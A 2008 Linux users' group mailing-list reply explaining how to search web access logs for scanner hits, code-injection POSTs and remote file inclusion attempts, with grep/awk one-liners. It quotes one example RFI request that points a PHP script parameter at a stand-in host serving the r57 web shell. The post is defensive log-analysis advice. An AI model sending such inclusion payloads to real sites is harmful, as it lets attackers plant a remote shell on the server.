Michael Lazin on 4 Nov 2008 17:44:32 -0800

Re: [PLUG] weird process?

by the way, if you find any files that you don't recognize you can grep for their time stamp

On Tue, Nov 4, 2008 at 8:39 PM, Michael Lazin <microlaser@gmail.com> wrote:
Morpheus fucking scanner is pretty common in access logs, I see it a lot.  If it is a 200 it means a successful connection, but of course if you have a custom 404 page it may just be a successful connection to a 404 page.  The most common exploits look like GET or POST script.php?var=http://evil.code.html/r57.txt or the like.  You can grep for ="" If it is a 200 and you have no custom 404 this was most likely a success RFI attack.  A get to a different file is usually not an attack unless it contains that =http string showing file inclusion.  Code injection attacks will most likely show up as a POST from a suspicious IP.  Try using grep with awk to examine all the IPs that have POST data associated with them in the logs, something like:
zgrep POST access.log* | grep " 200 " | awk '{print $1}'|sort -u

When searching for remote file inclusion try something like:

for i in  32 33 34.* current; do zgrep =http access.log.$i*|grep " 200 " |grep -v google | grep -v yahoo | less; done

to look for the =http string in the access logs from the past couple weeks.